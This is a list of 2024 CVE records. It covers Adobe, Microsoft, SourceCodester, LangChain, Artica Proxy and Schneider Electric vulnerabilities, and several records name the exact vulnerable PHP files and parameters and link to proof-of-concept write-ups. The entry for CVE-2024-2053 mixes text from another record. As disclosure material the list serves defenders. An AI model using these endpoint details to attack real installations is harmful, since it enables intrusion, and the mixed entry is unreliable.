CVE    2024    20725    Candidate    Substance3D - Painter versions 9.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html   |   URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html    Assigned (20231204)
CVE    2024    20723    Candidate    Substance3D - Painter versions 9.1.1 and earlier are affected by a Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html   |   URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html    Assigned (20231204)
CVE    2024    20721    Candidate    Acrobat Reader T5 (MSFT Edge) versions 120.0.2210.91 and earlier are affected by an Improper Input Validation vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20721   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20721    Assigned (20231204)
CVE    2024    20720    Candidate    Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead to arbitrary code execution by an attacker. Exploitation of this issue does not require user interaction.    MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html   |   URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html    Assigned (20231204)
CVE    2024    2072    Candidate    A vulnerability, which was classified as problematic, was found in SourceCodester Flashcard Quiz App 1.0. This affects an unknown part of the file /endpoint/update-flashcard.php. The manipulation of the argument question/answer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255387.    MISC:VDB-255387 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255387   |   MISC:VDB-255387 | SourceCodester Flashcard Quiz App update-flashcard.php cross site scripting   |   URL:https://vuldb.com/?id.255387   |   MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFlashcard%20Quiz%20App%20Using%20PHP%20and%20MySQL%5D%20XSS%20on%20update-flashcard.php.md   |   URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFlashcard%20Quiz%20App%20Using%20PHP%20and%20MySQL%5D%20XSS%20on%20update-flashcard.php.md    Assigned (20240301)
CVE    2024    20719    Candidate    Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an admin attacker to inject malicious scripts into every admin page. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field, that could be leveraged to gain admin access.    MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html   |   URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html    Assigned (20231204)
CVE    2024    20718    Candidate    Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by a Cross-Site Request Forgery (CSRF) vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to trick a victim into performing actions they did not intend to do, which could be used to bypass security measures and gain unauthorized access. Exploitation of this issue requires user interaction, typically in the form of the victim clicking a link or visiting a malicious website.    MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html   |   URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html    Assigned (20231204)
CVE    2024    20717    Candidate    Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.    MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html   |   URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html    Assigned (20231204)
CVE    2024    20716    Candidate    Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to an application denial-of-service. A high-privileged attacker could leverage this vulnerability to exhaust system resources, causing the application to slow down or crash. Exploitation of this issue does not require user interaction.    MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html   |   URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html    Assigned (20231204)
CVE    2024    20715    Candidate    Adobe Substance 3D Stager versions 2.1.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html   |   URL:https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html    Assigned (20231204)
CVE    2024    2071    Candidate    A vulnerability, which was classified as problematic, has been found in SourceCodester FAQ Management System 1.0. Affected by this issue is some unknown functionality of the component Update FAQ. The manipulation of the argument Frequently Asked Question leads to cross site scripting. The attack may be launched remotely. VDB-255386 is the identifier assigned to this vulnerability.    MISC:VDB-255386 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255386   |   MISC:VDB-255386 | SourceCodester FAQ Management System Update FAQ cross site scripting   |   URL:https://vuldb.com/?id.255386   |   MISC:https://github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/faq-management-system.md   |   URL:https://github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/faq-management-system.md    Assigned (20240301)
CVE    2024    2070    Candidate    A vulnerability classified as problematic was found in SourceCodester FAQ Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /endpoint/add-faq.php. The manipulation of the argument question/answer leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255385 was assigned to this vulnerability.    MISC:VDB-255385 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255385   |   MISC:VDB-255385 | SourceCodester FAQ Management System add-faq.php cross site scripting   |   URL:https://vuldb.com/?id.255385   |   MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFAQ%20Management%20System%20Using%20PHP%20and%20MySQL%5D%20XSS%20on%20add-faq.php.md   |   URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFAQ%20Management%20System%20Using%20PHP%20and%20MySQL%5D%20XSS%20on%20add-faq.php.md    Assigned (20240301)
CVE    2024    20697    Candidate    Windows Libarchive Remote Code Execution Vulnerability    MISC:Windows Libarchive Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20697    Assigned (20231128)
CVE    2024    20695    Candidate    Skype for Business Information Disclosure Vulnerability    MISC:Skype for Business Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20695    Assigned (20231128)
CVE    2024    20694    Candidate    Windows CoreMessaging Information Disclosure Vulnerability    MISC:Windows CoreMessaging Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20694    Assigned (20231128)
CVE    2024    20692    Candidate    Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability    MISC:Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20692    Assigned (20231128)
CVE    2024    20691    Candidate    Windows Themes Information Disclosure Vulnerability    MISC:Windows Themes Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20691    Assigned (20231128)
CVE    2024    20690    Candidate    Windows Nearby Sharing Spoofing Vulnerability    MISC:Windows Nearby Sharing Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20690    Assigned (20231128)
CVE    2024    2069    Candidate    A vulnerability classified as critical has been found in SourceCodester FAQ Management System 1.0. Affected is an unknown function of the file /endpoint/delete-faq.php. The manipulation of the argument faq leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255384.    MISC:VDB-255384 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255384   |   MISC:VDB-255384 | SourceCodester FAQ Management System delete-faq.php sql injection   |   URL:https://vuldb.com/?id.255384   |   MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFAQ%20Management%20System%20Using%20PHP%20and%20MySQL%5D%20SQLi%20on%20delete-faq.php.md   |   URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFAQ%20Management%20System%20Using%20PHP%20and%20MySQL%5D%20SQLi%20on%20delete-faq.php.md    Assigned (20240301)
CVE    2024    20682    Candidate    Windows Cryptographic Services Remote Code Execution Vulnerability    MISC:Windows Cryptographic Services Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20682    Assigned (20231128)
CVE    2024    20681    Candidate    Windows Subsystem for Linux Elevation of Privilege Vulnerability    MISC:Windows Subsystem for Linux Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20681    Assigned (20231128)
CVE    2024    20680    Candidate    Windows Message Queuing Client (MSMQC) Information Disclosure    MISC:Windows Message Queuing Client (MSMQC) Information Disclosure   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20680    Assigned (20231128)
CVE    2024    2068    Candidate    A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /endpoint/update-computer.php. The manipulation of the argument model leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255383.    MISC:VDB-255383 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255383   |   MISC:VDB-255383 | SourceCodester Computer Inventory System update-computer.php cross site scripting   |   URL:https://vuldb.com/?id.255383   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/STORED%20XSS%20upadte-computer.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/STORED%20XSS%20upadte-computer.php%20.md    Assigned (20240301)
CVE    2024    20679    Candidate    Azure Stack Hub Spoofing Vulnerability    MISC:Azure Stack Hub Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20679    Assigned (20231128)
CVE    2024    20677    Candidate    A security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365. As of February 13, 2024, the ability to insert FBX files has also been disabled in 3D Viewer. 3D models in Office documents that were previously inserted from an FBX file will continue to work as expected unless the Link to File option was chosen at insert time. This change is effective as of the January 9, 2024 security update.    MISC:Microsoft Office Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20677    Assigned (20231128)
CVE    2024    20676    Candidate    Azure Storage Mover Remote Code Execution Vulnerability    MISC:Azure Storage Mover Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20676    Assigned (20231128)
CVE    2024    20673    Candidate    Microsoft Office Remote Code Execution Vulnerability    MISC:Microsoft Office Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20673    Assigned (20231128)
CVE    2024    20671    Candidate    Microsoft Defender Security Feature Bypass Vulnerability    MISC:Microsoft Defender Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20671    Assigned (20231128)
CVE    2024    2067    Candidate    A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/delete-computer.php. The manipulation of the argument computer leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255382 is the identifier assigned to this vulnerability.    MISC:VDB-255382 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255382   |   MISC:VDB-255382 | SourceCodester Computer Inventory System delete-computer.php sql injection   |   URL:https://vuldb.com/?id.255382   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/SQL%20Injection%20delete-computer.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/SQL%20Injection%20delete-computer.php%20.md    Assigned (20240301)
CVE    2024    20667    Candidate    Azure DevOps Server Remote Code Execution Vulnerability    MISC:Azure DevOps Server Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20667    Assigned (20231128)
CVE    2024    20666    Candidate    BitLocker Security Feature Bypass Vulnerability    MISC:BitLocker Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20666    Assigned (20231128)
CVE    2024    20662    Candidate    Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability    MISC:Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20662    Assigned (20231128)
CVE    2024    20661    Candidate    Microsoft Message Queuing Denial of Service Vulnerability    MISC:Microsoft Message Queuing Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20661    Assigned (20231128)
CVE    2024    2066    Candidate    A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/add-computer.php. The manipulation of the argument model leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255381 was assigned to this vulnerability.    MISC:VDB-255381 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255381   |   MISC:VDB-255381 | SourceCodester Computer Inventory System add-computer.php cross site scripting   |   URL:https://vuldb.com/?id.255381   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/STORED%20XSS%20add-computer.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/STORED%20XSS%20add-computer.php%20.md    Assigned (20240301)
CVE    2024    20658    Candidate    Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability    MISC:Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20658    Assigned (20231128)
CVE    2024    20657    Candidate    Windows Group Policy Elevation of Privilege Vulnerability    MISC:Windows Group Policy Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20657    Assigned (20231128)
CVE    2024    20656    Candidate    Visual Studio Elevation of Privilege Vulnerability    MISC:Visual Studio Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20656    Assigned (20231128)
CVE    2024    20655    Candidate    Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability    MISC:Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20655    Assigned (20231128)
CVE    2024    20653    Candidate    Microsoft Common Log File System Elevation of Privilege Vulnerability    MISC:Microsoft Common Log File System Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20653    Assigned (20231128)
CVE    2024    20652    Candidate    Windows HTML Platforms Security Feature Bypass Vulnerability    MISC:Windows HTML Platforms Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20652    Assigned (20231128)
CVE    2024    2065    Candidate    A vulnerability was found in SourceCodester Barangay Population Monitoring System up to 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /endpoint/update-resident.php. The manipulation of the argument full_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255380.    MISC:VDB-255380 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255380   |   MISC:VDB-255380 | SourceCodester Barangay Population Monitoring System update-resident.php cross site scripting   |   URL:https://vuldb.com/?id.255380   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Barangay%20Population%20Monitoring%20System/Stored%20XSS%20update-resident.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Barangay%20Population%20Monitoring%20System/Stored%20XSS%20update-resident.php%20.md    Assigned (20240301)
CVE    2024    2064    Candidate    A vulnerability has been found in rahman SelectCours 1.0 and classified as problematic. Affected by this vulnerability is the function getCacheNames of the file CacheController.java of the component Template Handler. The manipulation of the argument fragment leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255379.    MISC:VDB-255379 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255379   |   MISC:VDB-255379 | rahman SelectCours Template CacheController.java getCacheNames injection   |   URL:https://vuldb.com/?id.255379   |   MISC:https://github.com/Andriesces/SelectCours-_Sever-side-Template-injection/blob/main/README.md   |   URL:https://github.com/Andriesces/SelectCours-_Sever-side-Template-injection/blob/main/README.md    Assigned (20240301)
CVE    2024    2063    Candidate    A vulnerability, which was classified as problematic, was found in SourceCodester Petrol Pump Management Software 1.0. Affected is an unknown function of the file /admin/app/profile_crud.php. The manipulation of the argument username leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255378 is the identifier assigned to this vulnerability.    MISC:VDB-255378 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255378   |   MISC:VDB-255378 | SourceCodester Petrol Pump Management Software profile_crud.php cross site scripting   |   URL:https://vuldb.com/?id.255378   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/profile_crud.php%20Unauthenticated%20STORED%20XSS.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/profile_crud.php%20Unauthenticated%20STORED%20XSS.md    Assigned (20240301)
CVE    2024    2062    Candidate    A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. This issue affects some unknown processing of the file /admin/edit_categories.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255377 was assigned to this vulnerability.    MISC:VDB-255377 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255377   |   MISC:VDB-255377 | SourceCodester Petrol Pump Management Software edit_categories.php sql injection   |   URL:https://vuldb.com/?id.255377   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/edit_categories.php%20SQL%20Injection.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/edit_categories.php%20SQL%20Injection.md    Assigned (20240301)
CVE    2024    2061    Candidate    A vulnerability classified as critical was found in SourceCodester Petrol Pump Management Software 1.0. This vulnerability affects unknown code of the file /admin/edit_supplier.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255376.    MISC:VDB-255376 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255376   |   MISC:VDB-255376 | SourceCodester Petrol Pump Management Software edit_supplier.php sql injection   |   URL:https://vuldb.com/?id.255376   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/edit_supplier.php%20SQL%20Injection.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/edit_supplier.php%20SQL%20Injection.md    Assigned (20240301)
CVE    2024    2060    Candidate    A vulnerability classified as critical has been found in SourceCodester Petrol Pump Management Software 1.0. This affects an unknown part of the file /admin/app/login_crud.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255375.    MISC:VDB-255375 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255375   |   MISC:VDB-255375 | SourceCodester Petrol Pump Management Software login_crud.php sql injection   |   URL:https://vuldb.com/?id.255375   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/login_crud.php%20SQL%20Injection.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/login_crud.php%20SQL%20Injection.md    Assigned (20240301)
CVE    2024    2059    Candidate    A vulnerability was found in SourceCodester Petrol Pump Management Software 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/app/service_crud.php. The manipulation of the argument photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-255374 is the identifier assigned to this vulnerability.    MISC:VDB-255374 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255374   |   MISC:VDB-255374 | SourceCodester Petrol Pump Management Software service_crud.php unrestricted upload   |   URL:https://vuldb.com/?id.255374   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/service_crud.php%20Unauthenticated%20Arbitrary%20File%20Upload.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/service_crud.php%20Unauthenticated%20Arbitrary%20File%20Upload.md    Assigned (20240301)
CVE    2024    2058    Candidate    A vulnerability was found in SourceCodester Petrol Pump Management Software 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/app/product.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255373 was assigned to this vulnerability.    MISC:VDB-255373 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255373   |   MISC:VDB-255373 | SourceCodester Petrol Pump Management Software product.php unrestricted upload   |   URL:https://vuldb.com/?id.255373   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/Unauthenticated%20Arbitrary%20File%20Upload.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/Unauthenticated%20Arbitrary%20File%20Upload.md   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/Surya2Developer%20Online_shopping_-system/SOURCECODESTER%20Petrol%20pump%20management%20software/Unauthenticated%20Arbitrary%20File%20Upload.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/Surya2Developer%20Online_shopping_-system/SOURCECODESTER%20Petrol%20pump%20management%20software/Unauthenticated%20Arbitrary%20File%20Upload.md    Assigned (20240301)
CVE    2024    2057    Candidate    A vulnerability was found in LangChain langchain_community 0.0.26. It has been classified as critical. Affected is the function load_local in the library libs/community/langchain_community/retrievers/tfidf.py of the component TFIDFRetriever. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.0.27 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-255372.    MISC:VDB-255372 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.255372   |   MISC:VDB-255372 | LangChain langchain_community TFIDFRetriever tfidf.py load_local server-side request forgery   |   URL:https://vuldb.com/?id.255372   |   MISC:https://github.com/bayuncao/vul-cve-16   |   URL:https://github.com/bayuncao/vul-cve-16   |   MISC:https://github.com/bayuncao/vul-cve-16/tree/main/PoC.pkl   |   URL:https://github.com/bayuncao/vul-cve-16/tree/main/PoC.pkl   |   MISC:https://github.com/langchain-ai/langchain/pull/18695   |   URL:https://github.com/langchain-ai/langchain/pull/18695    Assigned (20240301)
CVE    2024    2056    Candidate    Services that are running and bound to the loopback interface on the Artica Proxy are accessible through the proxy service. In particular, the "tailon" service is running, running as the root user, is bound to the loopback interface, and is listening on TCP port 7050. Security issues associated with exposing this network service are documented at gvalkov's 'tailon' GitHub repo. Using the tailon service, the contents of any file on the Artica Proxy can be viewed.    FULLDISC:20240305 KL-001-2024-004: Artica Proxy Loopback Services Remotely Accessible Unauthenticated   |   URL:http://seclists.org/fulldisclosure/2024/Mar/14   |   MISC:https://github.com/gvalkov/tailon#security   |   URL:https://github.com/gvalkov/tailon#security   |   MISC:https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt   |   URL:https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt    Assigned (20240301)
CVE    2024    2055    Candidate    The "Rich Filemanager" feature of Artica Proxy provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user.    FULLDISC:20240305 KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability   |   URL:http://seclists.org/fulldisclosure/2024/Mar/13   |   MISC:https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt   |   URL:https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt    Assigned (20240301)
CVE    2024    2054    Candidate    The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.    FULLDISC:20240305 KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability   |   URL:http://seclists.org/fulldisclosure/2024/Mar/12   |   MISC:https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt   |   URL:https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt    Assigned (20240301)
CVE    2024    2053    Candidate    The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user.    FULLDISC:20240305 KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability   |   URL:http://seclists.org/fulldisclosure/2024/Mar/11   |   MISC:https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt   |   URL:https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt    Assigned (20240301)
CVE    2024    2052    Candidate    CWE-552: Files or Directories Accessible to External Parties vulnerability exists that could allow unauthenticated files and logs exfiltration and download of files when an attacker modifies the URL to download to a different location.    MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf   |   URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf    Assigned (20240301)
CVE    2024    2051    Candidate    CWE-307: Improper Restriction of Excessive Authentication Attempts vulnerability exists that could cause account takeover and unauthorized access to the system when an attacker conducts brute-force attacks against the login form.    MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf   |   URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf    Assigned (20240301)
CVE    2024    2050    Candidate    CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability exists when an attacker injects then executes arbitrary malicious JavaScript code within the context of the product.    MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf   |   URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf    Assigned (20240301)
